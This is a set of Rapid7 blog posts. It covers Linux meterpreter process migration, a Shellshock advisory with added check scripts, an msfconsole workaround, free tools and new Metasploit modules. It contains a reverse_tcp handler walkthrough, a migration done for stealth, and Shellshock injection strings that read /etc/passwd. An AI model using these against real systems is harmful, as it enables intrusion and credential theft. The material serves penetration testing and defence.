This post is the eleventh in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

Hello everyone and Happy HaXmas (again) and New Year! On this HaXmas I would like to share with all of you a new feature which I'm personally very happy with. It's nothing super new and has limitations, but it's the first meterpreter feature I've collaborated on, and I feel really happy sharing it with all of you: support for migrating the Linux meterpreter payload. Before going ahead, let me clarify something, as you can read on the meterpreter github page: For some value of "working." Meterpreter in POSIX environments is not considered stable. It does stuff, but expect occasional problems. Unfortunately it applies to the process migration feature too. So be careful when using linux meterpreter and this feature on your pentest! You can experience reliability problems. Hopefully these lines will also help to explain the limitations and how to use the feature!

Requirement #1: From memory

First of all, linux migrate tries to imitate the windows migrate behavior. That means there is an important requirement: migration should happen from memory, without dropping meterpreter to disk. On windows it's accomplished with the well-known OpenProcess, WriteProcessMemory, CreateRemoteThread, etc. IPC APIs. But these aren't available on Linux, where we decided to use the "ptrace" interface to modify a process's memory and registers and to control its execution. Unfortunately, it introduces the first caveats:
- On modern Linux distributions, ptrace restrictions usually apply (for example the Yama LSM's kernel.yama.ptrace_scope sysctl, which at its default of 1 only lets a process attach to its own descendants), so migration isn't always possible.
- Once the meterpreter code is injected in the target process, the original process execution is replaced. It means the target process won't do its original task anymore, once migration has been accomplished.

That said, how to use it?
On older systems, where ptrace limitations are not in use, say for example Ubuntu 10.04 (32 bits), the migration usage is straightforward. It's something like this. Get a meterpreter session on your target:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.55.1
LHOST => 172.16.55.1
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.55.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.55.1
[*] Meterpreter session 1 opened (172.16.55.1:4444 -> 172.16.55.1:54901) at 2014-12-31 10:43:02 -0600

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >

Use the ps command to find a target process. There are some things to remember:
- The session user must own the target process.
- Use interruptible (or running) processes as targets.
- The target process won't do its original task after migration.
- Remember that linux meterpreter is only available for 32 bits, so even when running on a 64-bit system, the meterpreter process will be a 32-bit one. And the migration target process must be a 32-bit one too.

meterpreter > ps -U juan
Filtering on user name...

Process List
============

 PID    PPID  Name              Arch  Session  User  Path
 ---    ----  ----              ----  -------  ----  ----
 1894   1     gnome-keyring-d         0        juan  /usr/bin/gnome-keyring-daemon --daemonize --login
 1912   1220  gnome-session           0        juan  gnome-session
 1946   1912  ssh-agent               0        juan  /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session
 1949   1     dbus-launch             0        juan  /usr/bin/dbus-launch --exit-with-session gnome-session
 1950   1     dbus-daemon             0        juan  /bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
 1953   1     gconfd-2                0        juan  /usr/lib/libgconf2-4/gconfd-2
 1960   1     gnome-settings-         0        juan  /usr/lib/gnome-settings-daemon/gnome-settings-daemon
 1962   1     gvfsd                   0        juan  /usr/lib/gvfs/gvfsd
 1970   1     gvfs-fuse-daemo         0        juan  /usr/lib/gvfs//gvfs-fuse-daemon /home/juan/.gvfs
 1971   1     vmtoolsd                0        juan  /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr --blockFd 3
 1972   1912  polkit-gnome-au         0        juan  /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
 1975   1912  gnome-panel             0        juan  gnome-panel
 1978   1912  metacity                0        juan  metacity --replace
 1981   1912  nm-applet               0        juan  nm-applet --sm-disable
 1983   1     pulseaudio              0        juan  /usr/bin/pulseaudio --start --log-target=syslog
 1984   1912  nautilus                0        juan  nautilus
 1985   1912  gnome-power-man         0        juan  gnome-power-manager
 1986   1912  bluetooth-apple         0        juan  bluetooth-applet
 1995   1983  gconf-helper            0        juan  /usr/lib/pulseaudio/pulse/gconf-helper
 2020   1     gvfs-gdu-volume         0        juan  /usr/lib/gvfs/gvfs-gdu-volume-monitor
 2025   1     bonobo-activati         0        juan  /usr/lib/bonobo-activation/bonobo-activation-server --ac-activate --ior-output-fd=19
 2028   1     gvfs-gphoto2-vo         0        juan  /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
 2031   1     gvfsd-trash             0        juan  /usr/lib/gvfs/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0
 2032   1     gvfs-afc-volume         0        juan  /usr/lib/gvfs/gvfs-afc-volume-monitor
 2045   1     wnck-applet             0        juan  /usr/lib/gnome-panel/wnck-applet --oaf-activate-iid=OAFIID:GNOME_Wncklet_Factory --oaf-ior-fd=18
 2046   1     trashapplet             0        juan  /usr/lib/gnome-applets/trashapplet --oaf-activate-iid=OAFIID:GNOME_Panel_TrashApplet_Factory --oaf-ior-fd=24
 2054   1     clock-applet            0        juan  /usr/lib/gnome-panel/clock-applet --oaf-activate-iid=OAFIID:GNOME_ClockApplet_Factory --oaf-ior-fd=21
 2055   1     notification-ar         0        juan  /usr/lib/gnome-panel/notification-area-applet --oaf-activate-iid=OAFIID:GNOME_NotificationAreaApplet_Factory --oaf-ior-fd=30
 2058   1     indicator-apple         0        juan  /usr/lib/indicator-applet/indicator-applet-session --oaf-activate-iid=OAFIID:GNOME_FastUserSwitchApplet_Factory --oaf-ior-fd=36
 2059   1     indicator-apple         0        juan  /usr/lib/indicator-applet/indicator-applet --oaf-activate-iid=OAFIID:GNOME_IndicatorApplet_Factory --oaf-ior-fd=42
 2075   1     gvfsd-metadata          0        juan  /usr/lib/gvfs/gvfsd-metadata
 2076   1     indicator-me-se         0        juan  /usr/lib/indicator-me/indicator-me-service
 2078   1     indicator-messa         0        juan  /usr/lib/indicator-messages/indicator-messages-service
 2097   1     indicator-sessi         0        juan  /usr/lib/indicator-session/indicator-session-service
 2098   1     indicator-appli         0        juan  /usr/lib/indicator-application/indicator-application-service
 2099   1     indicator-sound         0        juan  /usr/lib/indicator-sound/indicator-sound-service
 2109   1     gvfsd-burn              0        juan  /usr/lib/gvfs/gvfsd-burn --spawner :1.6 /org/gtk/gvfs/exec_spaw/1
 2112   1     gnome-terminal          0        juan  gnome-terminal
 2114   1     gnome-screensav         0        juan  gnome-screensaver
 2115   2112  gnome-pty-helpe         0        juan  gnome-pty-helper
 2116   2112  bash                    0        juan  bash
 2147   1912  gdu-notificatio         0        juan  /usr/lib/gnome-disk-utility/gdu-notification-daemon
 2159   1912  evolution-alarm         0        juan  /usr/lib/evolution/2.28/evolution-alarm-notify
 2160   1912  python                  0        juan  python /usr/share/system-config-printer/applet.py
 2168   1912  update-notifier         0        juan  update-notifier
 2310   2112  bash                    0        juan  bash
 2745   1     notify-osd              0        juan  /usr/lib/notify-osd/notify-osd
 2846   2112  bash                    0        juan  bash
 2989   1     gvim                    0        juan  gvim
 2991   2112  bash                    0        juan  bash
 3378   1     [gedit] <defunct>       0        juan
 5965   2846  gdb                     0        juan  gdb /bin/ls
 17323  2991  [dummy] <defunct>       0        juan
 18063  2310  msf.elf                 0        juan  ./msf.elf
 18084  1     gcalctool               0        juan  gcalctool
 23799  1     [gedit] <defunct>       0        juan

In the case above the "gcalctool" process looks like a good candidate for this DEMO. Of course, it wouldn't be the best candidate on a real intrusion, since the calculator probably won't live long. The easy way to use the feature is just to provide the target PID:

meterpreter > migrate 18084
[*] Migrating to 18084
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 18084
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter >

Requirement #2: Reuse the original socket

As a second requirement, in order to imitate the windows behavior, the meterpreter session socket will be reused. On Windows a socket can be duplicated into a remote process with WSADuplicateSocket. But no such API exists on Linux as far as I know: you cannot dup() a socket into a process which isn't a child. Luckily UNIX domain sockets can be used to pass a file descriptor between unrelated processes (an SCM_RIGHTS message), with one caveat: the socket needs a path on the filesystem (which breaks the first requirement). The most important reason for "in-memory" migration is to remain stealthy, avoiding security products such as antivirus monitoring the filesystem. Hopefully, antivirus won't flag a UNIX domain socket used just to share a socket as malicious, which makes us think it is not so bad! By default the UNIX domain socket will be written to "/tmp", but you can specify an alternate directory with an optional second argument which the command accepts:

meterpreter > migrate -h
Usage: migrate <pid> [writable_path]

Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.

meterpreter > migrate 2075 /home/juan/.pulse
[*] Migrating to 2075
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2075

And that's all for this HaXmas and introduction to linux meterpreter migration! As always, remember that the meterpreter code is also open source if you're interested in the details! And there is a lot of work to do on the Linux meterpreter, improving its reliability and features. It's really interesting code to work with, with lots of joys awaiting. So, if you're interested in collaborating with Metasploit, it is definitely a good option to look at! Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.
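The requirements above (same owner, not defunct, 32-bit target, ptrace allowed) are exactly what fails silently on a modern box, so here is an added example, not Metasploit code and not from the post, of a pre-flight check in POSIX shell that a tester can run on the target before typing `migrate <pid>`. It reads the Yama `ptrace_scope` sysctl and `/proc/PID/{status,exe}`, which are assumed to exist; the script name in the usage comment is hypothetical, and the ELF header bytes used to exercise `elf_class` below are constructed.

```shell
#!/bin/sh
# Added example for the Linux meterpreter migration post; not Metasploit code.
# A pre-flight check for the requirements listed above, run on the target box
# before "migrate <pid>":
#   - Yama's kernel.yama.ptrace_scope decides whether PTRACE_ATTACH to an
#     unrelated same-uid process is allowed at all
#   - the target must be owned by the session's uid
#   - the target must be a 32-bit ELF (the 2014 Linux meterpreter is x86 only)
#   - the target must not be a zombie (<defunct> in the ps listing)
# Assumes /proc is mounted; the sysctl may be absent on kernels without Yama.

# ptrace_scope_meaning VALUE -> what a Yama ptrace_scope value means for migration
ptrace_scope_meaning() {
    case "$1" in
        0) echo "classic: any process of the same uid can be attached, migration possible" ;;
        1) echo "restricted: only descendants can be attached, migration to an unrelated pid fails" ;;
        2) echo "admin-only: CAP_SYS_PTRACE required" ;;
        3) echo "disabled: ptrace attach is off entirely" ;;
        absent) echo "Yama not present: no ptrace_scope restriction (other LSMs may still apply)" ;;
        *) echo "unknown value '$1'" ;;
    esac
}

# elf_class FILE -> ELF32, ELF64 or not-elf, from e_ident (magic + EI_CLASS byte)
elf_class() {
    ident=$(dd if="$1" bs=1 count=5 2>/dev/null | od -An -tx1 | tr -d ' \n')
    case "$ident" in
        7f454c4601) echo ELF32 ;;
        7f454c4602) echo ELF64 ;;
        *) echo not-elf ;;
    esac
}

# candidate_verdict SESSION_UID TARGET_UID STATE ELFCLASS -> "ok" or the first blocking reason
# STATE is the first token of the "State:" line in /proc/PID/status (Z = zombie).
candidate_verdict() {
    [ "$1" = "$2" ] || { echo "uid mismatch ($1 vs $2)"; return 0; }
    case "$3" in Z*) echo "zombie (<defunct>) process"; return 0 ;; esac
    [ "$4" = ELF32 ] || { echo "target is $4, need ELF32"; return 0; }
    echo ok
}

# migration_candidate PID -> verdict for a live process, read from /proc
migration_candidate() {
    [ -r "/proc/$1/status" ] || { echo "no such pid or not readable"; return 0; }
    target_uid=$(awk '/^Uid:/ { print $2 }' "/proc/$1/status")     # real uid
    state=$(awk '/^State:/ { print $2 }' "/proc/$1/status")
    candidate_verdict "$(id -u)" "$target_uid" "$state" "$(elf_class "/proc/$1/exe")"
}

main() {
    scope=$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo absent)
    echo "ptrace_scope=$scope: $(ptrace_scope_meaning "$scope")"
    for pid in "$@"; do
        echo "pid $pid: $(migration_candidate "$pid")"
    done
}

# usage: sh migrate_check.sh 18084 2075   (hypothetical filename; PIDs from the meterpreter "ps" output)
if [ $# -gt 0 ]; then main "$@"; fi
```

Note that a verdict of "ok" is necessary, not sufficient: with `ptrace_scope=1` the attach still fails unless the target is a descendant of the meterpreter process, and a seccomp filter or a container's restricted capability set can block ptrace independently of Yama.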

Bash-ing Into Your Network & Investigating CVE-2014-6271

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278). In sum: If you applied the ShellShock-related patches before Saturday September 27, you likely need to apply this new patch. We have updated our original blog post below to reflect this new information.]

Original blog post with September 29 updates below:

By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It's rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released September 25, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer dereference. The incomplete fixes are being tracked as CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.

Should I panic?

The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network, and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The root cause is that Bash imported shell functions from any environment variable whose value starts with "() {", and kept parsing and executing whatever followed the function body. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process.

What is vulnerable?

This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and the web server stores these in the process environment (HTTP_USER_AGENT and friends) before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell (/bin/sh) is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash (for example, the client-supplied command lands in SSH_ORIGINAL_COMMAND when ForceCommand is in use), but this vector is only relevant when the attacker has valid SSH credentials but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise).

There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. (There are Metasploit modules available validating this exploit path.) Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices, are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:
- Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell
- PHP applications running in CGI mode that call out to system() and where Bash is the default shell

Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions required for remote exploitation are fairly uncommon.

Update (September 25): A DDoS bot that exploits this issue has already been found in the wild by @yinettesys.

Update (September 29): There have been several reports of CVE-2014-6271 being exploited through worms. There is Proof of Concept code to exploit DHCP found by Geoff Walton. There are memory corruption flaws in the Bash parser found by @taviso, tracked as CVE-2014-7186 and CVE-2014-7187. We don't expect to see exploit code immediately and it wouldn't be applicable without specific targeting. A couple of new issues were found by Michal Zalewski (@lcamtuf): the first, CVE-2014-6277, permits remote code execution and requires a high level of expertise. The second, CVE-2014-6278, is more severe as it allows remote code execution and doesn't require a high level of expertise. These two vulnerabilities have been resolved in the upstream Ubuntu/RHEL/Debian patches that include Florian Weimer's unofficial patch.

Is it as bad as Heartbleed?

There has been a great deal of debate on this in the community, and we're not keen to jump on the "Heartbleed 2.0" bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks. BUT, and that's a big but, per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread.

What can we do to help?

[Updated October 1] Rapid7 Metasploit has been updated to assist with the detection and verification of these issues. Modules for testing various exploitation paths are available in both Metasploit Community and Pro. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. Rapid7 Nexpose has been updated with authenticated and remote checks for CVE-2014-6271 and CVE-2014-7169. Nexpose 5.10.12 improves the accuracy of the remote Shellshock (CVE-2014-6271) vulnerability check; customers should update their Nexpose deployments to Nexpose 5.10.12. Nexpose 5.10.13 added authenticated coverage for CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278. If you would like some advice on how to handle this situation, our Services team can help.

Are Rapid7's solutions affected?

[Updated September 29] Nexpose Virtual Appliances are provided with the Ubuntu distribution operating system, which has patches for CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. We've just updated the Nexpose Virtual Appliance Deployment Guide with the instructions to update the underlying Ubuntu OS. We recommend that you review the guide and apply the latest system patches that were released on September 27th.

More information

We've gathered all information we've published about BashBug right here: bashbug CVE-2014-6271 (shellshock): What is it? How to Remediate | Rapid7
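Two checks a practitioner wants at this point, as an added example that is not part of the post and not a Metasploit module: the public local probes for CVE-2014-6271 (function import executes trailing commands) and CVE-2014-7169 (the first fix still let a dangling redirection write a file), and a search of web server access logs for the "() {" prefix in the request, referer or user-agent fields, which is how the CGI vector above shows up in logs. The log lines are constructed with documentation-range IPs; the script assumes a POSIX sh with bash, mktemp and grep on PATH.

```shell
#!/bin/sh
# Added example for the Shellshock post; not Rapid7's or Metasploit's code.
#   shellshock_local     runs the two public local probes against the installed bash
#   shellshock_log_hits  counts access-log lines carrying the function-import prefix
# Both probes are harmless: the first only echoes a marker, the second writes a
# file into a throwaway directory. Assumes bash, mktemp and grep are on PATH.

# shellshock_local -> "vulnerable", "patched" or "no-bash"
shellshock_local() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }

    # CVE-2014-6271: an unpatched bash imports x as a function and then keeps
    # executing what follows the body, so "echo VULN" runs before the -c command.
    out=$(env x='() { :;}; echo VULN' bash -c 'echo probe' 2>/dev/null || true)
    case "$out" in *VULN*) echo vulnerable; return 0 ;; esac

    # CVE-2014-7169: with only the first fix applied, the dangling redirection
    # in X leaks into the next command, which then creates a file named "echo".
    dir=$(mktemp -d)
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 || true )
    if [ -e "$dir/echo" ]; then
        rm -rf "$dir"; echo vulnerable; return 0
    fi
    rm -rf "$dir"
    echo patched
}

# shellshock_log_hits LOGFILE -> number of lines with "() {" in the request,
# referer or user-agent, or the percent-encoded form scanners put in URLs.
# (QUERY_STRING reaches a CGI undecoded, so the encoded form is a probe
# signature rather than a working trigger; it is still worth flagging.)
shellshock_log_hits() {
    n=$(grep -c -i -e '() *{' -e '%28%29\(%20\)*%7b' "$1" 2>/dev/null || true)
    echo "${n:-0}"
}

# sample_access_log -> path to a constructed combined-format access log (example data)
sample_access_log() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:11:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'cat /etc/passwd'"
203.0.113.7 - - [25/Sep/2014:10:11:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; /usr/bin/id" "Mozilla/5.0"
198.51.100.9 - - [25/Sep/2014:10:12:00 +0000] "GET /index.html HTTP/1.1" 200 1042 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [25/Sep/2014:10:12:05 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 404 221 "-" "curl/7.38.0"
EOF
    echo "$f"
}

# usage: sh shellshock_check.sh --live [ACCESS_LOG]   (hypothetical filename)
if [ "${1:-}" = "--live" ]; then
    echo "local bash: $(shellshock_local)"
    if [ -n "${2:-}" ]; then
        echo "log hits in $2: $(shellshock_log_hits "$2")"
    fi
fi
```

A "patched" result from the local probe only covers the two parser bugs it exercises; for CVE-2014-6277 and CVE-2014-6278 rely on the package version from the September 27 update, as the post says. Log hits tell you that you were probed, not that the CGI executed anything: correlate with the response code and with process or outbound-connection telemetry from the web host.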

msfconsole failing to start? Try 'msfconsole -n'

As part of the last release, the Metasploit Engineering team here at Rapid7 has been on a path of refactoring in the Metasploit open source code in order to make it more performant and to get toward a larger goal of eventually breaking up the framework into a multitude of libraries that can be used and tested in a standalone way. This effort will make it easier to deliver features and respond to issues more quickly, as well as ensure that regressions and bugs can get diagnosed, triaged, and fixed up more effectively. Over the next year or so, we will be making drastic improvements in the loading, speed, and content reasoning capabilities of the framework, driving huge improvements to the features that our community members love and use every day.

Of course, we have several years' worth of often uncharted territory in the code to convert, and this process of modernizing the way Metasploit does things ended up causing a mysterious and frustrating bug for new and occasional users of the Metasploit Framework. Specifically, if you tried to start 'msfconsole', which is the terminal-based UI for Metasploit, and you didn't already have a database configured to store the fruits of your exploitation adventures, the console would crash out. We landed a fix for this crashy behavior yesterday in Pull Request #3666, for what was reported as bug #8840 late Friday afternoon, and this fix should hit the Kali distributions any time now.

Now, this bug doesn't manifest in the usual Metasploit installed environment (after all, most penetration testers like to keep a record of what they did), and anyone who has followed the Kali documentation on configuring a database, as well as any Metasploit contributor who has followed the MSF-DEV documentation on database config, wouldn't have noticed this problem. At any rate, if bug #8840 is still affecting you right now, you can work around the bad behavior simply by starting Metasploit with 'msfconsole -n', which is the explicit way to start without database backing. In the meantime, Rapid7 should have a fix out that restores the normal, non-explicit behavior with the impending weekly release.

tl;dr: Please pardon our dust while we remodel Casa de Metasploit.

Rapid7 Free Tools - Download Today!

Hello all,

It's your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you: Rapid7's suite of Free Security Tools. If you're a one-man shop trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I'm sure one or more of these tools would be an excellent addition to your existing security portfolio. Here's a list of our own portfolio. Click on the links to get some additional information, and to download the licenses.

Nexpose Community Edition: Our original tool. Nexpose is vulnerability scanning software that is the best in the business. Don't take my word for it though. To see how excellent it is, download the community edition and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste-test available with the community edition will be more than enough to prove its value.

Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really, is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more.

Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14-day trial, and learn how easy it is to keep the risk of the mobile devices on your network low.

RiskRater: Our newest free tool, RiskRater is a survey that will measure your mobile, endpoint, and user-based risk in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18-question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compare. Also, each question you answer provides you with real and actionable follow-up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download: just click to launch the tool, and get a good spot check on your real risk.

Metasploitable: If you're new to penetration testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system #1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started.

ScanNow - MySQL: The MySQL vulnerability CVE-2012-2122, best described in HD Moore's post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quickly and easily check whether your MySQL servers are vulnerable, just click to download and run the test yourself.

ScanNow - UPnP: This free ScanNow scanner checks your network-enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimates upwards of 50 million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potentially damaging security flaw.

UPnP Router Check: Want a quick router scan to check on the status of UPnP-enabled devices? Click here and run a scan quickly and easily. This will only check your router's exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status.

And finally, BrowserScan: This free tool enables your organization to check on the browsers currently in use, allows you to identify the risk of out-of-date items and unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site to look up all the browsers in use, and it can even return analytics to show you how you're addressing your risk over time.

I also recommend that you check out Kali Linux, by Offensive Security, the same team that brought you BackTrack. Kali Linux, the upgraded BackTrack, is a Debian-derived Linux distribution that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks, including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component of the download. Visit Offensive Security to learn more.

All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly that it can take as little as 10 seconds in some cases to find out your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it?

Now I know that's a lot to take in and review, so if you've got any questions about these products, or if you're currently using them and you'd be willing to share some of your best practices or tips on how they've worked successfully in your own environments, please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have. Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you?

Thanks all, and feel free to drop me a line here if you'd like to discuss offline.

Patrick Hellen

Weekly Update: Metasploit Pro on Chromebook, Galaxy Tab, and a Batch of New ZDI Exploits

Vegas Time!

Like the rest of the information security industry, we're buttoning down for the annual pilgrimage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our phones to avoid casual ownage, and test driving our new Chromebook builds of Metasploit Pro. They're pretty sweet. The latest update for ARM-arch Kali should run without a problem on an SD Card-installed Chromebook alternate OS. This just in: Metasploit Pro is known to successfully pop shells from a Galaxy Tab as well (photo courtesy of Mati "muts" Aharoni of Offensive Security). While the technical work is impressive by itself, the decals that Lance @lsanchez-r7 Sanchez cooked up pretty much steal the show. Yeah, we're pretty pleased with these. (:

As far as confirmed meatspace appearances from the Rapid7 Metasploit contingent, nex and rep are presenting at BlackHat about Cuckoo Sandbox, todb will be speaking at BSidesLV Common Ground with Thomas d'Otreppe about the vices and virtues of open source security, and of course Egypt will be delivering in-depth Metasploit training at BlackHat. So, be careful out there, stay safe (infosec-wise, if not health-wise), swing by our BlackHat Booth #517 for some awesome Metasploit 10-year anniversary T-shirts, and let's see what we can do to advance the state of the art of open source security for another year or ten.

New Modules

We've got seven new modules with this week's update. As you can see below, this week is pretty heavy on the ZDI-reversed exploits. We've got ZDI-11-352 for HP products, a couple of vectors for ZDI-13-110 for Apple QuickTime, and ZDI-13-147 for VMware.

- Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113
- D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924
- Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121
- Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110
- Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110
- HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352
- VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Nexpose 5.6 - CIS RHEL Certified!

Nexpose 5.6, released last week, builds on our USGCB, FDCC, and CIS Windows certifications by adding CIS certified assessment of Red Hat Enterprise Linux systems. Nexpose 5.6 includes the CIS "Level One" and "Level Two" policies for RHEL 4, 5, & 6. This means you can now use Rapid7's integrated vulnerability and configuration management solution to assess the configuration of your RHEL desktops and servers.

